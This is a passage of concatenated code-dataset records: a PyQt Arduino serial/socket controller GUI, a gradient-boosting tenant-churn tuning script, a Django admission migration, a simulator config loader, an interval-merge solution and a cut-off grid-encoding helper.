self.READ_TIMEOUT = float(self.readTimeoutSerialInput.text())\n self.THREAD_SLEEP = float(self.threadSleepSerialInput.text())\n if self.THREAD_SLEEP <= 0:\n self.THREAD_SLEEP = 0.0000001\n self.threadSleepSerialInput.setText(\"0.0000001\")\n self.ser = Serial(self.DEVICE, self.BAUD)\n self.ser.timeout = 2\n self.CONNECTED = True\n self.ser.timeout = self.READ_TIMEOUT\n self.connectionStatus.setText(\"Status: CONNECTED\")\n self.connectButtonSerial.setText(\"Disconnect\")\n except:\n self.CONNECTED = False\n self.connectionStatus.setText(\"Status: CONNECTION FAILED\")\n\n if self.COM_MODE == \"SOCKET\":\n try:\n self.ADDRESS = self.addressInput.text()\n self.PORT = int(self.portInput.text())\n self.RECV_BUFFER = int(self.comBufferInput.text())\n self.READ_TIMEOUT = float(self.readTimeoutSocketInput.text())\n self.THREAD_SLEEP = float(self.threadSleepSocketInput.text())\n if self.THREAD_SLEEP <= 0:\n self.THREAD_SLEEP = 0.0000001\n self.threadSleepSocketInput.setText(\"0.0000001\")\n self.ser = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.ser.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.ser.setblocking(0)\n self.ser.settimeout(2)\n self.ser.connect((self.ADDRESS, self.PORT))\n self.ser.settimeout(self.READ_TIMEOUT)\n self.CONNECTED = True\n self.connectionStatus.setText(\"Status: CONNECTED\")\n self.connectButtonSocket.setText(\"Disconnect\")\n except:\n self.CONNECTED = False\n self.connectionStatus.setText(\"Status: CONNECTION FAILED\")\n\n def initUI(self):\n self.grid = QtGui.QGridLayout()\n self.grid.setSpacing(10)\n\n self.selectCom = QtGui.QComboBox()\n self.selectCom.addItem(\"SERIAL\")\n self.selectCom.addItem(\"SOCKET\")\n self.selectCom.currentIndexChanged.connect(self.changeComType)\n self.selectCom.setFixedSize(200, 30)\n self.grid.addWidget(self.selectCom, 0, 0)\n \n self.connectionStatus = QtGui.QLabel('Status: OFFLINE')\n self.connectionStatus.setFont(QtGui.QFont('SansSerif', 14))\n credit = QtGui.QLabel(\"RoboControl \\nBy Martin Rioux - martin.rioux2@gmail.com\")\n credit.setFont(QtGui.QFont('SansSerif', 8))\n\n status_and_credit = QtGui.QHBoxLayout()\n status_and_credit.addWidget(self.connectionStatus)\n status_and_credit.addWidget(credit)\n self.grid.addLayout(status_and_credit, 0, 1)\n\n #GENERAL CONFIGS\n\n self.configs = QtGui.QHBoxLayout()\n self.grid.addLayout(self.configs, 1, 0, 1, 2)\n\n ## SERIAL OUT ##\n serialOutLabel = QtGui.QLabel('Serial Out')\n self.serialOutText = QtGui.QTextEdit()\n self.serialOutText.setReadOnly(True)\n\n outBox = QtGui.QVBoxLayout()\n outBox.addWidget(serialOutLabel)\n outBox.addWidget(self.serialOutText)\n self.grid.addLayout(outBox, 2, 0)\n\n ## SERIAL IN ##\n serialInLabel = QtGui.QLabel('Serial In')\n self.serialInText = QtGui.QTextEdit()\n self.serialInText.setReadOnly(True)\n\n inBox = QtGui.QVBoxLayout()\n inBox.addWidget(serialInLabel)\n inBox.addWidget(self.serialInText)\n self.grid.addLayout(inBox, 2, 1)\n\n self.setLayout(self.grid)\n\n self.setGeometry(0,0,1024,768)\n self.center()\n self.setWindowTitle('RoboControl')\n self.show()\n self.changeComType()\n\n def deleteConfig(self, layout):\n if layout is not None:\n while layout.count():\n item = layout.takeAt(0)\n widget = item.widget()\n if widget is not None:\n widget.deleteLater()\n else:\n self.deleteConfig(item.layout())\n\n def buildSerialConfigs(self):\n self.deviceLabel = QtGui.QLabel('Device')\n self.deviceInput = QtGui.QLineEdit(self.DEVICE)\n self.baudLabel = QtGui.QLabel('Baud')\n self.baudInput = QtGui.QLineEdit(str(self.BAUD))\n self.baudInput.setValidator(QtGui.QIntValidator())\n self.readTimeoutSerialLabel = QtGui.QLabel('Timeout (sec) [0.0002]')\n self.readTimeoutSerialInput = QtGui.QLineEdit(str(self.READ_TIMEOUT))\n self.readTimeoutSerialInput.setValidator(QtGui.QDoubleValidator())\n self.threadSleepSerialLabel = QtGui.QLabel('Thread sleep (sec) [0.0002]')\n self.threadSleepSerialInput = QtGui.QLineEdit(str(self.THREAD_SLEEP))\n self.threadSleepSerialInput.setValidator(QtGui.QDoubleValidator())\n self.connectButtonSerialLabel = QtGui.QLabel('')\n self.connectButtonSerial = QtGui.QPushButton('Connect', self)\n self.connectButtonSerial.clicked.connect(self.connectToArduino)\n\n device = QtGui.QVBoxLayout()\n device.addWidget(self.deviceLabel)\n device.addWidget(self.deviceInput)\n baud = QtGui.QVBoxLayout()\n baud.addWidget(self.baudLabel)\n baud.addWidget(self.baudInput)\n readtimeoutSerial = QtGui.QVBoxLayout()\n readtimeoutSerial.addWidget(self.readTimeoutSerialLabel)\n readtimeoutSerial.addWidget(self.readTimeoutSerialInput)\n threadSleepSerial = QtGui.QVBoxLayout()\n threadSleepSerial.addWidget(self.threadSleepSerialLabel)\n threadSleepSerial.addWidget(self.threadSleepSerialInput)\n connectBSerial = QtGui.QVBoxLayout()\n connectBSerial.addWidget(self.connectButtonSerialLabel)\n connectBSerial.addWidget(self.connectButtonSerial)\n \n self.configs.addLayout(device)\n self.configs.addLayout(baud)\n self.configs.addLayout(readtimeoutSerial)\n self.configs.addLayout(threadSleepSerial)\n self.configs.addLayout(connectBSerial)\n\n def buildSocketConfigs(self):\n self.addressLabel = QtGui.QLabel('Address')\n self.addressInput = QtGui.QLineEdit(self.ADDRESS)\n self.portLabel = QtGui.QLabel('Port')\n self.portInput = QtGui.QLineEdit(str(self.PORT))\n self.portInput.setValidator(QtGui.QIntValidator())\n self.comBufferLabel = QtGui.QLabel('Buffer [1024]')\n self.comBufferInput = QtGui.QLineEdit(str(self.RECV_BUFFER))\n self.comBufferInput.setValidator(QtGui.QIntValidator())\n self.readTimeoutSocketLabel = QtGui.QLabel('Timeout (sec) [0.0002]')\n self.readTimeoutSocketInput = QtGui.QLineEdit(str(self.READ_TIMEOUT))\n self.readTimeoutSocketInput.setValidator(QtGui.QDoubleValidator())\n self.threadSleepSocketLabel = QtGui.QLabel('Thread sleep (sec) [0.0002]')\n self.threadSleepSocketInput = QtGui.QLineEdit(str(self.THREAD_SLEEP))\n self.threadSleepSocketInput.setValidator(QtGui.QDoubleValidator())\n self.connectButtonSocketLabel = QtGui.QLabel('')\n self.connectButtonSocket = QtGui.QPushButton('Connect', self)\n self.connectButtonSocket.clicked.connect(self.connectToArduino)\n\n address = QtGui.QVBoxLayout()\n address.addWidget(self.addressLabel)\n address.addWidget(self.addressInput)\n port = QtGui.QVBoxLayout()\n port.addWidget(self.portLabel)\n port.addWidget(self.portInput)\n comBuffer = QtGui.QVBoxLayout()\n comBuffer.addWidget(self.comBufferLabel)\n comBuffer.addWidget(self.comBufferInput)\n readtimeoutSocket = QtGui.QVBoxLayout()\n readtimeoutSocket.addWidget(self.readTimeoutSocketLabel)\n readtimeoutSocket.addWidget(self.readTimeoutSocketInput)\n threadSleepSocket = QtGui.QVBoxLayout()\n threadSleepSocket.addWidget(self.threadSleepSocketLabel)\n threadSleepSocket.addWidget(self.threadSleepSocketInput)\n connectBSocket = QtGui.QVBoxLayout()\n connectBSocket.addWidget(self.connectButtonSocketLabel)\n connectBSocket.addWidget(self.connectButtonSocket)\n\n self.configs.addLayout(address)\n self.configs.addLayout(port)\n self.configs.addLayout(comBuffer)\n self.configs.addLayout(readtimeoutSocket)\n self.configs.addLayout(threadSleepSocket)\n self.configs.addLayout(connectBSocket)\n\n def changeComType(self):\n self.disconnectArduino()\n self.COM_MODE = self.selectCom.currentText()\n self.deleteConfig(self.configs)\n if self.COM_MODE == \"SERIAL\":\n self.displaySerialConfig()\n elif self.COM_MODE == \"SOCKET\":\n self.displaySocketConfig()\n\n def displaySerialConfig(self):\n self.buildSerialConfigs()\n\n def displaySocketConfig(self):\n self.buildSocketConfigs()\n\n def disconnectArduino(self):\n try:\n self.ser.close()\n except: pass\n if self.CONNECTED:\n if self.COM_MODE == \"SOCKET\":\n self.connectButtonSocket.setText(\"Connect\")\n if self.COM_MODE == \"SERIAL\":\n self.connectButtonSerial.setText(\"Connect\")\n self.CONNECTED = False\n self.connectionStatus.setText(\"Status: OFFLINE\")\n\n def center(self):\n qr = self.frameGeometry()\n cp = QtGui.QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n def onChanged(self, text):\n self.lbl.setText(text)\n self.lbl.adjustSize() \n\n def keyPressEvent(self, e):\n if e.isAutoRepeat() == True:\n return\n specialKeyAction(self, e, \"pressed\")\n e.accept()\n\n def keyReleaseEvent(self, e):\n if e.isAutoRepeat() == True:\n return\n specialKeyAction(self, e, \"released\") \n e.accept()\n\n def sendSerialData(self, data):\n if self.CONNECTED:\n self.COMMAND_TO_SEND.append(data + \"\\n\")\n\n\n def displayThreadData(self):\n while len(self.SERIAL_DATA_SENT) >= 1:\n data = self.SERIAL_DATA_SENT[0]\n del self.SERIAL_DATA_SENT[0]\n self.serialOutText.moveCursor(QtGui.QTextCursor.End)\n self.serialOutText.insertPlainText(data)\n\n while len(self.SERIAL_DATA_RECEIVED) >= 1:\n data = self.SERIAL_DATA_RECEIVED[0]\n del self.SERIAL_DATA_RECEIVED[0]\n self.serialInText.moveCursor(QtGui.QTextCursor.End)\n self.serialInText.insertPlainText(data)\n receivedDataHandler(self, data)\n\n QtCore.QTimer.singleShot(10, self.displayThreadData)\n\n def closeEvent(self, event):\n reply = QtGui.QMessageBox.question(self, 'Warning',\n \"Really want to exit?\", QtGui.QMessageBox.Yes | \n QtGui.QMessageBox.No, QtGui.QMessageBox.No)\n if reply == QtGui.QMessageBox.Yes:\n self.running = 0\n event.accept()\n else:\n event.ignore() \n \n def serialThread(self):\n while self.running:\n if self.CONNECTED:\n data = \"\"\n try:\n if self.COM_MODE == \"SERIAL\":\n data += self.ser.readline()\n if self.COM_MODE == \"SOCKET\":\n data = self.ser.recv(self.RECV_BUFFER)\n except: pass\n \n if data != \"\":\n self.SERIAL_INPUT += data\n if (self.SERIAL_INPUT.find(\"\\n\") != -1): \n # print(self.SERIAL_INPUT)\n self.SERIAL_DATA_RECEIVED.append(self.SERIAL_INPUT)\n self.SERIAL_INPUT = \"\"\n\n # print (self.ser.out_waiting)\n if len(self.COMMAND_TO_SEND) >= 1:\n data = self.COMMAND_TO_SEND[0]\n del self.COMMAND_TO_SEND[0]\n self.SERIAL_DATA_SENT.append(data)\n if DEBUG_MODE == False:\n try: \n if self.COM_MODE == \"SERIAL\":\n self.ser.write(data)\n if self.COM_MODE == \"SOCKET\":\n self.ser.send(data)\n except: pass\n \n\n # time.sleep(0.0000002) #MAGIC VALUE?\n time.sleep(self.THREAD_SLEEP)\n\ndef main():\n app = QtGui.QApplication(sys.argv)\n ex = RoboControl()\n sys.exit(app.exec_())\n\nif __name__ == '__main__':\n main()","sub_path":"remote_serial_tcp_Arduino_controller/remote_control.py","file_name":"remote_control.py","file_ext":"py","file_size_in_byte":17385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"155766375","text":"import pandas as pd\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom numpy import *\nfrom sklearn import metrics\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\n\n\n\n\n\n#1.数据预处理\nmodelData = pd.read_csv(path+'/数据/modelData.csv', header = 0)\nallFeatures = list(modelData.columns)\n#去除租客ID和中介ID\nallFeatures.remove('CUST_ID')\nallFeatures.remove('Agent_IND')\n\n\n\n#划分数据集\nX_train, X_test, y_train, y_test = train_test_split(modelData[allFeatures],modelData['CHURN_CUST_IND'], test_size=0.5,random_state=9)\n\ny_train.value_counts()\n\n\n\n#使用默认参数\ngbm0 = GradientBoostingClassifier(random_state=10)\ngbm0.fit(X_train,y_train)\ny_pred = gbm0.predict(X_test)\ny_predprob = gbm0.predict_proba(X_test)[:,1]\nprint (\"Accuracy : %.4g\" % metrics.accuracy_score(y_test, y_pred))\nprint (\"AUC Score (Testing): %f\" % metrics.roc_auc_score(y_test, y_predprob))\n\ny_pred2 = gbm0.predict(X_train)\ny_predprob2 = gbm0.predict_proba(X_train)[:,1]\nprint (\"Accuracy : %.4g\" % metrics.accuracy_score(y_train, y_pred2))\nprint (\"AUC Score (Testing): %f\" % metrics.roc_auc_score(y_train, y_predprob2))\n\n\n#调参1\nparam_test1 = {'n_estimators':range(20,81,10)}\ngsearch1 = GridSearchCV(estimator = GradientBoostingClassifier(learning_rate=0.1, min_samples_split=300,\n min_samples_leaf=20,max_depth=8,max_features='sqrt', subsample=0.8,random_state=10),\n param_grid = param_test1, scoring='roc_auc',iid=False,cv=5)\ngsearch1.fit(X_train,y_train)\ngsearch1.grid_scores_, gsearch1.best_params_, gsearch1.best_score_\n\nparam_test2 = {'max_depth':range(3,14,2), 'min_samples_split':range(100,801,200)}\ngsearch2 = GridSearchCV(estimator = GradientBoostingClassifier(learning_rate=0.1, n_estimators=70, min_samples_leaf=20,\n max_features='sqrt', subsample=0.8, random_state=10),\n param_grid = param_test2, scoring='roc_auc',iid=False, cv=5)\ngsearch2.fit(X_train,y_train)\ngsearch2.grid_scores_, gsearch2.best_params_, gsearch2.best_score_\n\nparam_test3 = {'min_samples_split':range(400,1001,100), 'min_samples_leaf':range(60,101,10)}\ngsearch3 = GridSearchCV(estimator = GradientBoostingClassifier(learning_rate=0.1, n_estimators=70,max_depth=9,\n max_features='sqrt', subsample=0.8, random_state=10),\n param_grid = param_test3, scoring='roc_auc',iid=False, cv=5)\ngsearch3.fit(X_train,y_train)\ngsearch3.grid_scores_, gsearch3.best_params_, gsearch3.best_score_\n\n\n#选择n_estimators\ngbm1 = GradientBoostingClassifier(learning_rate=0.1, n_estimators=70,max_depth=9, min_samples_leaf =70,\n min_samples_split =500, max_features='sqrt', subsample=0.8, random_state=10)\ngbm1.fit(X_train,y_train)\ny_pred1 = gbm1.predict(X_train)\ny_predprob1= gbm1.predict_proba(X_train)[:,1]\nprint (\"Accuracy : %.4g\" % metrics.accuracy_score(y_train, y_pred1))\nprint (\"AUC Score (Train): %f\" % metrics.roc_auc_score(y_train, y_predprob1))\n\ny_pred2 = gbm1.predict(X_test)\ny_predprob2= gbm1.predict_proba(X_test)[:,1]\nprint (\"Accuracy : %.4g\" % metrics.accuracy_score(y_test, y_pred2))\nprint (\"AUC Score (Train): %f\" % metrics.roc_auc_score(y_test, y_predprob2))\n\n\n#选择max_features\nparam_test4 = {'max_features':range(5,31,2)}\ngsearch4 = GridSearchCV(estimator = GradientBoostingClassifier(learning_rate=0.1, n_estimators=70,max_depth=9, min_samples_leaf =70,\n min_samples_split =500, subsample=0.8, random_state=10),\n param_grid = param_test4, scoring='roc_auc',iid=False, cv=5)\ngsearch4.fit(X_train,y_train)\ngsearch4.grid_scores_, gsearch4.best_params_, gsearch4.best_score_\n\n#选择subsample\nparam_test5 = {'subsample':[0.6,0.7,0.75,0.8,0.85,0.9]}\ngsearch5 = GridSearchCV(estimator = GradientBoostingClassifier(learning_rate=0.1, n_estimators=70,max_depth=9, min_samples_leaf =70,\n min_samples_split =500, max_features=28, random_state=10),\n param_grid = param_test5, scoring='roc_auc',iid=False, cv=5)\ngsearch5.fit(X_train,y_train)\ngsearch5.grid_scores_, gsearch5.best_params_, gsearch5.best_score_\n\n#选择learning rate and min_samples_split\ngbm2 = GridSearchCV(estimator = GradientBoostingClassifier(learning_rate=0.05, n_estimators=70,max_depth=9, min_samples_leaf =70,\n min_samples_split =1000, max_features=28, random_state=10,subsample=0.8),\n param_grid = param_test5, scoring='roc_auc',iid=False, cv=5)\ngbm2.fit(X_train,y_train)\n\ny_pred1 = gbm2.predict(X_train)\ny_predprob1= gbm2.predict_proba(X_train)[:,1]\nprint (\"Accuracy : %.4g\" % metrics.accuracy_score(y_train, y_pred1))\nprint (\"AUC Score (Train): %f\" % metrics.roc_auc_score(y_train, y_predprob1))\n\ny_pred2 = gbm2.predict(X_test)\ny_predprob2= gbm2.predict_proba(X_test)[:,1]\nprint (\"Accuracy : %.4g\" % metrics.accuracy_score(y_test, y_pred2))\nprint (\"AUC Score (Train): %f\" % metrics.roc_auc_score(y_test, y_predprob2))\n\n\nclf = GradientBoostingClassifier(learning_rate=0.05, n_estimators=70,max_depth=9, min_samples_leaf =70,\n min_samples_split =1000, max_features=28, random_state=10,subsample=0.8)\nclf.fit(X_train, y_train)\nimportances = clf.feature_importances_\n#按照特征重要度排序\nfeatures_sorted = argsort(-importances)\nimport_feautres = [allFeatures[i] for i in features_sorted]\n","sub_path":"Tenant Churn(GBDT).py","file_name":"Tenant Churn(GBDT).py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3859780","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nimport admission.models\nimport uuid\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='OfferStudent',\n fields=[\n ('id', models.IntegerField(serialize=False, primary_key=True)),\n ('student_id', models.UUIDField()),\n ('title', models.TextField()),\n ('name', models.CharField(max_length=127)),\n ('school_level', models.CharField(max_length=8)),\n ('major', models.CharField(max_length=16)),\n ('major_type', models.CharField(max_length=16)),\n ('gpa', models.FloatField()),\n ('chinese_name', models.CharField(max_length=255)),\n ('english_name', models.CharField(max_length=255)),\n ('country', models.CharField(max_length=32)),\n ('project', models.CharField(max_length=255)),\n ('offer_major', models.CharField(max_length=255)),\n ('offer_major_type', models.CharField(max_length=255)),\n ('offer_type', models.CharField(max_length=16)),\n ('received_time', models.DateField()),\n ('is_admitted', models.BooleanField()),\n ('is_chosen', models.BooleanField()),\n ('advisor', models.IntegerField()),\n ('publish_status', models.IntegerField()),\n ],\n options={\n 'db_table': 'offer_student_school_view',\n 'managed': False,\n },\n ),\n migrations.CreateModel(\n name='Admission',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.TextField(verbose_name='Title')),\n ('student_pros', models.TextField(default=None, null=True, verbose_name='Student Pros', blank=True)),\n ('student_cons', models.TextField(default=None, null=True, verbose_name='Student Cons', blank=True)),\n ('plan', models.TextField(default=None, null=True, verbose_name='Plan', blank=True)),\n ('advice', models.TextField(default=None, null=True, verbose_name='Advice', blank=True)),\n ],\n options={\n 'verbose_name': 'Admission Info',\n },\n ),\n migrations.CreateModel(\n name='EducationalHistory',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('degree', models.CharField(max_length=8, verbose_name='Degree')),\n ('school', models.CharField(default=None, max_length=127, null=True, verbose_name='School Name', blank=True)),\n ('school_level', models.CharField(default=None, max_length=8, null=True, verbose_name='School Level', blank=True)),\n ('major', models.CharField(default=None, max_length=16, null=True, verbose_name='Major', blank=True)),\n ('major_type', models.CharField(default=None, max_length=16, null=True, verbose_name='Major Type', blank=True)),\n ('score', models.FloatField(default=None, null=True, verbose_name='Average Score', blank=True)),\n ('gpa', models.FloatField(default=None, null=True, verbose_name='4 based GPA', blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Exam',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('exam_type', models.CharField(max_length=32, verbose_name='Exam Type')),\n ('score', models.FloatField(verbose_name='Score')),\n ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='Create Time')),\n ('base_exam', models.ForeignKey(related_name='items', default=None, blank=True, to='admission.Exam', null=True)),\n ],\n options={\n 'verbose_name': 'Exam',\n },\n ),\n migrations.CreateModel(\n name='Feedback',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='Create Time')),\n ('content', models.TextField(verbose_name='Feedback Content')),\n ('source', models.CharField(default='\\u5b66\\u751f\\u5bb6\\u957f', max_length=16, verbose_name='Feedback source')),\n ],\n ),\n migrations.CreateModel(\n name='FeedbackImage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('feedback', models.ForeignKey(related_name='images', to='admission.Feedback')),\n ],\n ),\n migrations.CreateModel(\n name='GenericImage',\n fields=[\n ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),\n ('name', models.CharField(default=None, max_length=127, null=True, blank=True)),\n ('image', models.ImageField(upload_to=admission.models.rename_file)),\n ('create_time', models.DateTimeField(auto_now_add=True)),\n ],\n options={\n 'verbose_name': '\\u56fe\\u50cf',\n },\n ),\n migrations.CreateModel(\n name='Offer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('project', models.CharField(default=None, max_length=255, null=True, verbose_name='Project', blank=True)),\n ('year', models.IntegerField(default=2016, null=True, verbose_name='Year', blank=True)),\n ('season', models.CharField(default=None, max_length=8, null=True, verbose_name='Season', blank=True)),\n ('major', models.CharField(default=None, max_length=255, null=True, verbose_name='Major', blank=True)),\n ('major_english_name', models.CharField(default=None, max_length=255, null=True, verbose_name='English Name of Major', blank=True)),\n ('major_type', models.CharField(default=None, max_length=255, null=True, verbose_name='Major Type', blank=True)),\n ('degree', models.CharField(default=None, max_length=8, null=True, verbose_name='Degree', blank=True)),\n ('scholarship', models.IntegerField(default=None, null=True, verbose_name='Scholarship', blank=True)),\n ('received_time', models.DateField(default=datetime.date.today, null=True, verbose_name='Offer Received Date', blank=True)),\n ('offer_type', models.CharField(default=None, max_length=16, null=True, verbose_name='Offer Type', blank=True)),\n ('is_admitted', models.BooleanField(default=True, verbose_name='Is Admitted')),\n ('is_chosen', models.BooleanField(default=False, verbose_name='Is Chosen')),\n ('publish_status', models.IntegerField(default=0, verbose_name='Publish Status')),\n ('offer_image', models.ForeignKey(default=None, blank=True, to='admission.GenericImage', null=True, verbose_name='Offer Image')),\n ],\n options={\n 'verbose_name': 'Offer',\n },\n ),\n migrations.CreateModel(\n name='School',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('english_name', models.CharField(max_length=255, verbose_name='English Name')),\n ('chinese_name', models.CharField(max_length=255, verbose_name='Chinese Name')),\n ('country', models.CharField(max_length=32, verbose_name='Country')),\n ('badge', models.ForeignKey(default=None, blank=True, to='admission.GenericImage', null=True, verbose_name='Badge')),\n ],\n options={\n 'verbose_name': 'School Info',\n },\n ),\n migrations.CreateModel(\n name='Student',\n fields=[\n ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),\n ('name', models.CharField(max_length=127, verbose_name='Student Name')),\n ('country', models.CharField(default=None, max_length=32, null=True, verbose_name='Country', blank=True)),\n ('city', models.CharField(default=None, max_length=127, null=True, verbose_name='City', blank=True)),\n ('degree', models.CharField(default=None, max_length=8, null=True, verbose_name='Highest Degree', blank=True)),\n ('source', models.CharField(max_length=8, verbose_name='Admission Source')),\n ('advisor', models.IntegerField(default=None, null=True, verbose_name='Advisor UID', blank=True)),\n ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='Create Time')),\n ],\n options={\n 'verbose_name': 'Student Info',\n },\n ),\n migrations.CreateModel(\n name='WorkingExperience',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('company', models.CharField(max_length=225, verbose_name='Company')),\n ('occupation', models.CharField(default=None, max_length=127, null=True, verbose_name='Occupation', blank=True)),\n ('occupation_type', models.CharField(default=None, max_length=127, null=True, verbose_name='Occupation Type', blank=True)),\n ('detail', models.TextField(default=None, null=True, verbose_name='Experience Detail', blank=True)),\n ('from_date', models.DateField(verbose_name='From Date')),\n ('to_date', models.DateField(default=None, null=True, verbose_name='To Date', blank=True)),\n ('student', models.ForeignKey(related_name='working_experience', to='admission.Student')),\n ],\n options={\n 'verbose_name': 'Working Experience',\n },\n ),\n migrations.AddField(\n model_name='offer',\n name='school',\n field=models.ForeignKey(related_name='school', to='admission.School'),\n ),\n migrations.AddField(\n model_name='offer',\n name='student',\n field=models.ForeignKey(related_name='offers', to='admission.Student'),\n ),\n migrations.AddField(\n model_name='feedbackimage',\n name='image',\n field=models.ForeignKey(to='admission.GenericImage'),\n ),\n migrations.AddField(\n model_name='feedback',\n name='student',\n field=models.ForeignKey(related_name='feedback', to='admission.Student'),\n ),\n migrations.AddField(\n model_name='exam',\n name='student',\n field=models.ForeignKey(related_name='exams', to='admission.Student'),\n ),\n migrations.AddField(\n model_name='educationalhistory',\n name='student',\n field=models.ForeignKey(related_name='educational_history', to='admission.Student'),\n ),\n migrations.AddField(\n model_name='admission',\n name='student',\n field=models.OneToOneField(related_name='admission', to='admission.Student'),\n ),\n migrations.AlterUniqueTogether(\n name='exam',\n unique_together=set([('student', 'base_exam')]),\n ),\n migrations.AlterUniqueTogether(\n name='educationalhistory',\n unique_together=set([('student', 'degree')]),\n ),\n ]\n","sub_path":"admission/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":12155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"629250974","text":"import configparser\nimport argparse\nimport textwrap\nfrom space_body import SpaceBody\n\n\nclass Config:\n width = 0\n height = 0\n starts = 0\n display = (0, 0)\n stopOnCollision = True\n star_colors = []\n generators = []\n\n def __init__(self):\n parser = argparse.ArgumentParser(description='Solar mechanics simulator',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=textwrap.dedent('\\ '))\n\n parser.add_argument('-f', '--file',\n dest='file',\n default='config.ini',\n help='configuration file')\n\n args = parser.parse_args()\n\n self.config = configparser.ConfigParser()\n self.config.read(args.file)\n\n sys = self.config['System']\n self.width = int(sys.get(\"WIN_WIDTH\", 800))\n self.height = int(sys.get(\"WIN_HEIGHT\", 640))\n self.stars = int(sys.get(\"STAR_NUM\", 10))\n\n self.display = (self.width, self.height)\n\n colors = sys.get(\"STAR_COLORS\")\n self.star_colors = colors.split(',')\n\n self.space_color = sys.get(\"SPACE_COLOR\")\n\n self.onCollision = sys.get(\"ON_COLLISION\", \"stop\")\n\n gens = sys.get(\"GENERATORS\")\n\n if gens is not None:\n self.generators = gens.split(',')\n\n def get_system(self):\n s = []\n\n for i in self.config.sections():\n if i != \"System\" and not (i in set(self.generators)):\n obj = SpaceBody(i,\n int(self.config[i][\"Mass\"]),\n float(self.config[i][\"X\"]),\n float(self.config[i][\"Y\"]),\n float(self.config[i][\"VX\"]),\n float(self.config[i][\"VY\"]))\n\n obj.set_view_model(int(self.config[i][\"R\"]),\n self.config[i][\"color\"],\n self.space_color)\n\n s.append(obj)\n return s\n\n def get_display(self):\n return self.display\n\n def get_width(self):\n return self.width\n\n def get_height(self):\n return self.height\n\n def get_stars(self):\n return self.stars\n\n def get_star_colors(self):\n return self.star_colors\n\n def get_space_color(self):\n return self.space_color\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"49246543","text":"class Interval(object):\n\tdef __init__(self, s=0, e =0):\n\t\tself.start = s\n\t\tself.end = e\n\n\tdef __str(self):\n\t\treturn \"[\" + str(self.start) + \",\" + str(self.end) + \"]\"\n\nclass Solution(object):\n\tdef merge(self, intervals):\n\t\tresult = []\n\t\tif not intervals:\n\t\t\treturn result\n\t\tintervals.sort(key = lambda x: x.start)\n\t\tresult.append(intervals[0])\n\t\tfor Interval in intervals[1:]:\n\t\t\tprev = result[-1]\n\t\t\tif prev.end >= Interval.start:\n\t\t\t\tprev.end = max(prev.end, Interval.end)\n\t\t\telse:\n\t\t\t\tresult.append(Interval)\n\t\treturn result\n\t\t\n","sub_path":"Part1/Merge_Intervals.py","file_name":"Merge_Intervals.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"451824135","text":"# Codificacion y decodificacion de una tabla de Nf filas y Nc columnas\r\n\r\ndef codifica(f, c, Nf, Nc):\r\n # Funcion que codifica la fila f y columna c\r\n assert ((f >= 0) and (f <= Nf - 1)),\"Fila incorrecta! Debe ser un numero entre 0 y {}\".format(Nf)\r\n assert ((c >= 0) and (c <= Nc - 1)),\"Columna incorrecta! Debe ser un numero entre 0 y {}\".format(Nc)\r\n n = Nc * f + c\r\n # print(u'Número a codificar:', n)\r\n return n\r\n\r\ndef decodifica(x, Nf, Nc):\r\n # Funcion que codifica un caracter en su respectiva fila f y columna c de la tabla\r\n n = x\r\n assert((n >= 0) and (n <= Nf * Nc - 1)), 'Caracter incorrecto! Debe estar entre 0 y {0}, se recibio {1}'.format(Nf * Nc - 1,n)\r\n f = int(n / Nc)\r\n c = n % Nc\r\n return f, c\r\n\r\ndef codifica3(f, c, o, Nf, Nc, No):\r\n # Funcion que codifica la fila f, columna c, y objeto o\r\n # print('f : '+str(f))\r\n # print('c : '+str(c))\r\n # print('o : '+str(o))\r\n # print('Nf: '+str(Nf))\r\n # print('Nc: '+str(Nc))\r\n # print('No: '+str(No))\r\n assert((f >= 0) and (f <= Nf - 1)), \"Fila incorrecta! Debe ser un numero entre 0 y {}\".format(str(Nf - 1))\r\n assert((c >= 0) and (c <= Nc - 1)), \"Columna incorrecta! Debe ser un numero entre 0 y {}\".format(str(Nc - 1))\r\n assert((o >= 0) and (o <= No - 1)), \"Fila incorrecta! Debe ser un numero entre 0 y {}\".format(str(No - 